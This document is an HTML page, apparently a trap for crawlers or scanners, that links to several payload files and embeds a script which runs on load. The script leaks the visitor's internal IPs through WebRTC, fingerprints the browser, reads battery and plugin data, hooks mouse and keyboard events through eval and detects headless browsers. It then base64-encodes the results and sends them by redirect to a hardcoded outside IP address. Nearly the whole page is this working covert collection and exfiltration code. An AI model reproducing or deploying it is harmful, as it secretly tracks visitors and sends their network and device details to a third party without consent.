<html>
<body>
<a href='/payload/bomb.html'>bomb.html</a>
<a href='/payload/file_read3.html'>payload/file_read3.html</a>
<a href='/payload/test2.xml'>test2.xml</a>
<a href='/payload/test.svg'>test.svg</a>

<h2>payload:</h2>

bomb.html  file_read3.html  test2.xml  test.svg


<canvas id="glcanvas" width="640" height="480"></canvas>
<script src='./fingerprint.js'></script>
<script>

var webrtc_res = 'internal ip: ';
var fp = '';
var window_info = "window size: " + window.outerWidth + 'x' +  window.outerHeight;
var close_time = '';
var special_func = 'special functions: ';
var battery_s = 'battery status: ';
var webaudio_s = 'webaudio status: '
var websocket_s = 'websocket status: ';
var webgl_s = 'webGL status: ';
var webrtc_s = 'webrtc status: ';
var plugins_s = 'plugins: ';
var all_events = {'onmouseover':0,'onmouseout':0, 'onmousedown':0, 'onmouseup':0, 'onmouseleave':0, 'onmouseenter':0, 'ondblclick':0, 'oncontextmenu':0, 'onclick':0, 'onkeydown':0, 'onkeypress':0, 'onkeyup':0 };
var event_res = 'mouse and keyboard events: ';
var newline = String.fromCharCode(10);


function webrtc() { 
  
  var i = 0;
  var myPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; 
  if(!myPeerConnection){
    console.log('webrtc not supported!');
    webrtc_res = "webrtc not supported!";
    return;
  }
  var pc = new myPeerConnection({iceServers: []}), 
    noop = function() {},
    localIPs = {},
    ipRegex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g,
    key;
 
  function ipIterate(ip) {
    if (!localIPs[ip]) {webrtc_res += ip + ";";console.log('find one ip: ' + ip + newline);};
    localIPs[ip] = true;
  }
  
  pc.onicecandidate = function(ice) { //listen for candidate events
    if (!ice || !ice.candidate || !ice.candidate.candidate || !ice.candidate.candidate.match(ipRegex)) return;
    ice.candidate.candidate.match(ipRegex).forEach(ipIterate);
  };


  pc.createDataChannel(""); //create a bogus data channel
   pc.createOffer().then(function(sdp) {
    sdp.sdp.split(newline).forEach( function(line) {
      if (line.indexOf('candidate') < 0) return;
      line.match(ipRegex).forEach(ipIterate);
    });

    
     pc.setLocalDescription(sdp, noop, noop);
    

  }); 
}


function pad (str, max) {
  str = str.toString();
  return str.length < max ? pad("0" + str, max) : str;
}


function gen_fp(){
  var fp1 = new Fingerprint();
  var fp2 = new Fingerprint({canvas: true});
  var fp3 = new Fingerprint({ie_activex: true});
  var fp4 = new Fingerprint({screen_resolution: true});
  var fp_1 = pad(fp1.get().toString('16'),8);
  var fp_2 = pad(fp2.get().toString('16'),8);
  //var fp_2 = fp2.get().toString('16').padStart(8,'0');
  var fp_3 = pad(fp3.get().toString('16'),8);
  var fp_4 = pad(fp4.get().toString('16'),8);
  fp = fp + fp_1 + fp_2 + fp_3 + fp_4;
  fp = "fingerprint: " + fp ;
}


function alert_detection(){

  var start = Date.now();
  alert('test for crawler');
  var elapse = Date.now() - start;
  close_time = "closed time(ms): " + elapse;
  if (elapse < 15) {
    console.log("headless browser detected.");
  } else {
    console.log("normal browser detected.");
  }

}


function special_function(){
  test_funcs  = [navigator.plugins, window.callPhantom, window._phantom, window.Buffer, window.emit, window.spawn, window.webdriver, window.domAutomation, window.domAutomationController];

  if( window.callPhantom || window._phantom){
    special_func += 'PhantomJS;';
  }

  if(window.Buffer){
    special_func += 'nodejs;';
  }

  if(window.emit){
    special_func += 'couchjs;';
  }

  if(window.spawn){
    special_func += 'rhino;';
  }

  if(window.webdriver){
    special_func += 'selenium;';
  }

  if(special_func == 'special functions: '){
    special_func += 'None';
  }
}


function webaudio_status(){
  if(!(window.AudioContext || window.webkitAudioContext)){
       webaudio_s += 'not supported';
       return;
  }else{
    webaudio_s += 'supported';
  }

}

function websocket_status(){
  if(!WebSocket){
       websocket_s += 'not supported';
       return;
  }else{
    websocket_s += 'supported';
  }

}

function battery_status(){
  if(!navigator.getBattery){
       battery_s += 'not supported';
       return;
  }
  navigator.getBattery().then(myBattery);

  function myBattery(battery) {
  battery_s += (battery.level * 100) + '%;';
  battery_s += battery.chargingTime + ' Seconds;';
  battery_s += battery.dischargingTime + ' Seconds;';

  if (battery.charging === true) {
    battery_s += 'Charging;';
  } else if (battery.charging === false) {
    battery_s += 'Discharging;';
  }
}
}

function webgl_status(){
  canvas = document.querySelector("#glcanvas");
  gl = canvas.getContext("webgl");
  if(!gl){
    webgl_s += 'not supported';
  }else{
    webgl_s += 'supported';
  }
}


function webrtc_status(){
  if(! (window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection)){
      webrtc_s += 'not supported';
  }else{
      webrtc_s += 'supported';
  }
}


function plugin_list(){
  var pluginsLength = navigator.plugins.length;

  for(var i = 0; i < pluginsLength; i++) {
    plugins_s += navigator.plugins[i].name + ':';
    plugins_s += navigator.plugins[i].filename + ':';
    plugins_s += navigator.plugins[i].description + ':';
    plugins_s += navigator.plugins[i].version?navigator.plugins[i].version:""  + ';';
  }

}



function hook_mouse_keyboard_event(){
  for(var eve in all_events){
    console.log('document.'+ eve + ' = on_mouse_keyboard_event;');
    eval('document.'+ eve + ' = on_mouse_keyboard_event;');
  }
}

function on_mouse_keyboard_event(x){
   event_type = x.type;
   all_events['on' + event_type] += 1;
}


hook_mouse_keyboard_event();
webrtc();
gen_fp();
battery_status();
websocket_status();
webaudio_status();
webgl_status();
webrtc_status();
plugin_list();
special_function();
alert_detection();

function final(){
    return webrtc_res + newline + fp  + newline + window_info + newline + close_time + newline + battery_s +newline + webaudio_s + newline + websocket_s + newline + webgl_s + newline + webrtc_s + newline + plugins_s + newline + special_func + newline + event_res + JSON.stringify(all_events) + newline;
}


setTimeout(function() {var f = final();console.log(f);window.location.href='http://47.91.145.204/1.php?a=' + btoa(f);}, 1000); 


</script>
</body>
</html>


